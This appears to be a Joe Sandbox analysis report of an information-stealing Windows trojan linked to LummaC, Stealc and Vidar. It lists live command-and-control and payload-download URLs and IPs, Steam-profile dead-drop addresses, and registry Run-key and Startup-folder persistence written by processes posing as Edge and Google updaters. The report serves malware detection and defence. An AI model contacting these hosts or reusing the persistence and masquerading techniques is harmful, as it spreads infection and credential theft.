                                                                                                                                                                        https://yalubluseks.eu/receive.phpTLKMService.exe, 00000002.00000002.4578665236.00000000035A8000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4578665236.000000000335F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://recaptcha.net/recaptcha/;RegAsm.exe, 0000002F.00000002.3450965793.000000000150B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://steamcommunity.com/profiles/76561199780418869/inventory/RegAsm.exe, 00000014.00000002.3179432809.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drfalse
                                                                                                                                                                            		unknown
                                                                                                                                                                            https://49.12.197.9/msvcp140.dllkRegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		unknown
                                                                                                                                                                              https://ipgeolocation.io/RegAsm.exefalse
                                                                                                                                                                                		unknown
                                                                                                                                                                                https://steamcommunity.com/ORegAsm.exe, 0000002F.00000002.3450965793.0000000001551000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  http://147.45.44.104/prog/66fbfcc301a31_swws.exeexeRegAsm.exe, 00000006.00000002.2325722695.00000000015EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    https://broadcast.st.dl.eccdnx.comRegAsm.exe, 0000002F.00000002.3450965793.000000000150B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    http://41.216.188.190/api/wp-ping.phpRegAsm.exe, 00000006.00000002.2325722695.000000000154A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2325722695.000000000158D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      https://community.akamai.steamstatic.coRegAsm.exe, 0000002F.00000002.3443973307.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        https://49.12.197.9/sqlp.dllBRegAsm.exe, 00000014.00000002.3190699075.000000000165F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          https://49.12.197.9/vcruntime140.dll?RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            http://147.45.44.104/WRegAsm.exe, 00000006.00000002.2325722695.0000000001634000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              https://community.akamaRegAsm.exe, 00000027.00000002.2588002060.00000000012EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                http://147.45.44.104LKMService.exe, 00000002.00000002.4578665236.0000000003245000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  http://crl.entrust.net/ts1ca.crl0RegAsm.exe, 00000006.00000002.2328296570.0000000004037000.00000004.00000020.00020000.00000000.sdmp, userCGHCGIIDGD.exe.19.dr, 66fbfcc9963ca_ldfsna[1].exe.35.dr, userJEHDHIEGII.exe.19.drfalse
                                                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  https://steamcommunity.com/workshop/RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drfalse
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    https://login.steampowered.com/RegAsm.exe, 0000002F.00000002.3450965793.000000000150B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    https://store.steampowered.com/legal/RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000027.00000002.2589625219.0000000001356000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.3002399614.0000000001406000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drfalse
                                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=eRegAsm.exe, 00000014.00000002.3179432809.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drfalse
                                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    https://49.12.197.9/softokn3.dllURegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		unknown

                                                                                                                                                                                                      World Map of Contacted IPs

                                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                                                                      Public IPs

                                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                      46.8.231.109
                                                                                                                                                                                                      		unknownRussian Federation
                                                                                                                                                                                                      		28917FIORD-ASIP-transitoperatorinRussiaUkraineandBalticstrue
                                                                                                                                                                                                      49.12.197.9
                                                                                                                                                                                                      		unknownGermany
                                                                                                                                                                                                      		24940HETZNER-ASDEtrue
                                                                                                                                                                                                      104.26.12.205
                                                                                                                                                                                                      		api.ipify.orgUnited States
                                                                                                                                                                                                      		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                      104.21.17.174
                                                                                                                                                                                                      		absorptioniw.siteUnited States
                                                                                                                                                                                                      		13335CLOUDFLARENETUStrue
                                                                                                                                                                                                      34.117.59.81
                                                                                                                                                                                                      		ipinfo.ioUnited States
                                                                                                                                                                                                      		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                                                                                                                                                      172.67.195.67
                                                                                                                                                                                                      		mysterisop.siteUnited States
                                                                                                                                                                                                      		13335CLOUDFLARENETUStrue
                                                                                                                                                                                                      147.45.44.104
                                                                                                                                                                                                      		unknownRussian Federation
                                                                                                                                                                                                      		2895FREE-NET-ASFREEnetEUfalse
                                                                                                                                                                                                      104.21.56.150
                                                                                                                                                                                                      		abnomalrkmu.siteUnited States
                                                                                                                                                                                                      		13335CLOUDFLARENETUStrue
                                                                                                                                                                                                      104.26.3.46
                                                                                                                                                                                                      		iplogger.orgUnited States
                                                                                                                                                                                                      		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                      45.132.206.251
                                                                                                                                                                                                      		cowod.hopto.orgRussian Federation
                                                                                                                                                                                                      		59731LIFELINK-ASRUtrue
                                                                                                                                                                                                      104.21.18.193
                                                                                                                                                                                                      		snarlypagowo.siteUnited States
                                                                                                                                                                                                      		13335CLOUDFLARENETUStrue
                                                                                                                                                                                                      41.216.188.190
                                                                                                                                                                                                      		unknownSouth Africa
                                                                                                                                                                                                      		40676AS40676USfalse
                                                                                                                                                                                                      188.114.97.3
                                                                                                                                                                                                      		soldiefieop.siteEuropean Union
                                                                                                                                                                                                      		13335CLOUDFLARENETUStrue
                                                                                                                                                                                                      104.102.49.254
                                                                                                                                                                                                      		steamcommunity.comUnited States
                                                                                                                                                                                                      		16625AKAMAI-ASUStrue
                                                                                                                                                                                                      172.67.208.141
                                                                                                                                                                                                      		questionsmw.storeUnited States
                                                                                                                                                                                                      		13335CLOUDFLARENETUStrue
                                                                                                                                                                                                      104.21.16.12
                                                                                                                                                                                                      		gravvitywio.storeUnited States
                                                                                                                                                                                                      		13335CLOUDFLARENETUStrue
                                                                                                                                                                                                      104.26.13.205
                                                                                                                                                                                                      		unknownUnited States
                                                                                                                                                                                                      		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                      173.231.16.77
                                                                                                                                                                                                      		api64.ipify.orgUnited States
                                                                                                                                                                                                      		18450WEBNXUSfalse
                                                                                                                                                                                                      172.67.184.196
                                                                                                                                                                                                      		treatynreit.siteUnited States
                                                                                                                                                                                                      		13335CLOUDFLARENETUStrue
                                                                                                                                                                                                      172.67.140.92
                                                                                                                                                                                                      		yalubluseks.euUnited States
                                                                                                                                                                                                      		13335CLOUDFLARENETUSfalse

                                                                                                                                                                                                      General Information

                                                                                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                      Analysis ID:1524021
                                                                                                                                                                                                      Start date and time:2024-10-02 14:41:53 +02:00
                                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                                      Overall analysis duration:0h 15m 35s
                                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                                      Report type:full
                                                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                      Number of analysed new started processes analysed:55
                                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                                      Technologies:
                                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                                      Sample name:file.exe
                                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@71/183@27/20
                                                                                                                                                                                                      EGA Information:
                                                                                                                                                                                                      • Successful, ratio: 90%
                                                                                                                                                                                                      HCA Information:
                                                                                                                                                                                                      • Successful, ratio: 84%
                                                                                                                                                                                                      • Number of executed functions: 303
                                                                                                                                                                                                      • Number of non-executed functions: 78
                                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                                                                      Warnings

                                                                                                                                                                                                      • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 20.42.65.92, 20.189.173.22, 52.168.117.173, 2.23.209.150, 2.23.209.154, 2.23.209.158, 2.23.209.160, 2.23.209.149, 2.23.209.168, 2.23.209.156, 2.23.209.166, 2.23.209.167
                                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): www.bing.com, onedsblobprdeus16.eastus.cloudapp.azure.com, client.wns.windows.com, slscr.update.microsoft.com, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, www.bing.com.edgekey.net, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com
                                                                                                                                                                                                      • Execution Graph export aborted for target file.exe, PID 7060 because it is empty
                                                                                                                                                                                                      • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                      • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                      • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                      • VT rate limit hit for: file.exe

                                                                                                                                                                                                      Simulations

                                                                                                                                                                                                      Behavior and APIs

                                                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                                                      08:42:42API Interceptor1x Sleep call for process: file.exe modified
                                                                                                                                                                                                      08:42:43API Interceptor2157348x Sleep call for process: LKMService.exe modified
                                                                                                                                                                                                      08:42:59API Interceptor3x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                      08:43:18API Interceptor4156995x Sleep call for process: GoogleUpdater.exe modified
                                                                                                                                                                                                      08:43:24API Interceptor7x Sleep call for process: RegAsm.exe modified
                                                                                                                                                                                                      14:42:46AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run LKMService_f5ad86b5dd8e489690bbd1068a1566bc C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                      14:42:54AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run LKMService_057e415b921b4c378f9896f9d0db791f C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                      14:43:03AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run LKMService_f5ad86b5dd8e489690bbd1068a1566bc C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                      14:43:12AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run LKMService_057e415b921b4c378f9896f9d0db791f C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                      14:43:21AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_27cbb7ed26514b6aa95ad6d80834ca4b.lnk
                                                                                                                                                                                                      14:43:34AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_4fdf717f7b074146a6c5e1dc515a8133.lnk
                                                                                                                                                                                                      14:43:47AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3019ecd989774f7c91e19aadfbea9368.lnk
                                                                                                                                                                                                      14:44:01AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_6816d158af9343beb893d1364e0fd2e4.lnk
                                                                                                                                                                                                      14:44:15AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c5f5c59425a8470e95d441ef95b94f08.lnk
                                                                                                                                                                                                      14:44:30AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_666ad270d6a945c18b2ed969cdd2fdfd.lnk
                                                                                                                                                                                                      14:44:45AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c2281b197e5442038e12b56a6db4504e.lnk
                                                                                                                                                                                                      14:44:58AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e379655f9a9441ba96407e1b49e84575.lnk
                                                                                                                                                                                                      14:45:11AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d857b5873cc54042adfe8f95a043f803.lnk
                                                                                                                                                                                                      14:45:24AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9fc58fbff2d742be9e0a18a138fd312b.lnk
                                                                                                                                                                                                      14:45:37AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_12d1ac11f5c84b56b26427d14aab95b0.lnk
                                                                                                                                                                                                      14:45:56AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_da48a62b83b2480c83c15d28e7a45272.lnk
                                                                                                                                                                                                      14:46:09AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1a07146ad1534076af36e7c03864ec1f.lnk
                                                                                                                                                                                                      14:46:22AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c0012fe47f3f4b1fa7d83472951ee7d7.lnk
                                                                                                                                                                                                      14:46:35AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_37397b494c9f4da492d3e3c2855b58bc.lnk
                                                                                                                                                                                                      14:46:48AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_10b34bee3b0e4f4e90c33ae6a2cf0133.lnk
                                                                                                                                                                                                      14:47:01AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c3e54527f137456db866ca8baeeda89a.lnk
                                                                                                                                                                                                      14:47:14AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3c918f8ec7ad43638f336aad481fcf6d.lnk
                                                                                                                                                                                                      14:47:28AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e3dfbe92fb774fda93c54580528f3ac2.lnk

                                                                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                                                                      IPs

                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                      46.8.231.109file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                                                      • 46.8.231.109/c4754d4f680ead72.php
                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                      • 46.8.231.109/c4754d4f680ead72.php
                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                      • 46.8.231.109/c4754d4f680ead72.php
                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                      • 46.8.231.109/c4754d4f680ead72.php
                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                      • 46.8.231.109/c4754d4f680ead72.php
                                                                                                                                                                                                      6JA2YPtbeB.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                      • 46.8.231.109/c4754d4f680ead72.php
                                                                                                                                                                                                      hTR7xY0d0V.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                      • 46.8.231.109/c4754d4f680ead72.php
                                                                                                                                                                                                      N83LFtMTUS.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                      • 46.8.231.109/c4754d4f680ead72.php
                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                      • 46.8.231.109/c4754d4f680ead72.php
                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                      • 46.8.231.109/c4754d4f680ead72.php
                                                                                                                                                                                                      49.12.197.9file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                6JA2YPtbeB.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                  hTR7xY0d0V.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                    N83LFtMTUS.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                      104.26.12.205Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                                                                                                                                                                                                                      • api.ipify.org/
                                                                                                                                                                                                                      2zYP8qOYmJ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • api.ipify.org/
                                                                                                                                                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • api.ipify.org/
                                                                                                                                                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • api.ipify.org/
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                      • api.ipify.org/
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                      • api.ipify.org/
                                                                                                                                                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • api.ipify.org/
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                                      • api.ipify.org/
                                                                                                                                                                                                                      SecuriteInfo.com.Win64.Evo-gen.13899.14592.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • api.ipify.org/
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                      • api.ipify.org/

                                                                                                                                                                                                                      Domains

                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                      treatynreit.sitefile.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 104.21.84.18
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 172.67.184.196
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 104.21.84.18
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 104.21.84.18
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 172.67.184.196
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 104.21.84.18
                                                                                                                                                                                                                      api64.ipify.orgfile.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 104.237.62.213
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5SystemzBrowse
                                                                                                                                                                                                                      • 173.231.16.77
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5SystemzBrowse
                                                                                                                                                                                                                      • 173.231.16.77
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 104.237.62.213
                                                                                                                                                                                                                      CSBls4grBI.exeGet hashmaliciousLummaC, Socks5SystemzBrowse
                                                                                                                                                                                                                      • 173.231.16.77
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC StealerBrowse
                                                                                                                                                                                                                      • 173.231.16.77
                                                                                                                                                                                                                      SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeGet hashmaliciousAmadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog StealerBrowse
                                                                                                                                                                                                                      • 173.231.16.77
                                                                                                                                                                                                                      SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeGet hashmaliciousAmadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog StealerBrowse
                                                                                                                                                                                                                      • 104.237.62.213
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, PureLog Stealer, RedLine, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                      • 173.231.16.77
                                                                                                                                                                                                                      9poHPPZxlB.exeGet hashmaliciousLummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                      • 104.237.62.213
                                                                                                                                                                                                                      cowod.hopto.orgfile.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 45.132.206.251
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 45.132.206.251
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 45.132.206.251
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 45.132.206.251
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 45.132.206.251
                                                                                                                                                                                                                      6JA2YPtbeB.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 45.132.206.251
                                                                                                                                                                                                                      hTR7xY0d0V.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 45.132.206.251
                                                                                                                                                                                                                      N83LFtMTUS.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 45.132.206.251
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 45.132.206.251
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 45.132.206.251
                                                                                                                                                                                                                      iplogger.orgfile.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 104.26.2.46
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 172.67.74.161
                                                                                                                                                                                                                      SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeGet hashmaliciousAmadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog StealerBrowse
                                                                                                                                                                                                                      • 172.67.74.161
                                                                                                                                                                                                                      SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeGet hashmaliciousAmadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog StealerBrowse
                                                                                                                                                                                                                      • 104.26.2.46
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, PureLog Stealer, RedLine, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                      • 104.26.3.46
                                                                                                                                                                                                                      gobEmOm5sr.exeGet hashmaliciousLummaC, PureLog Stealer, RedLine, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                      • 104.26.2.46
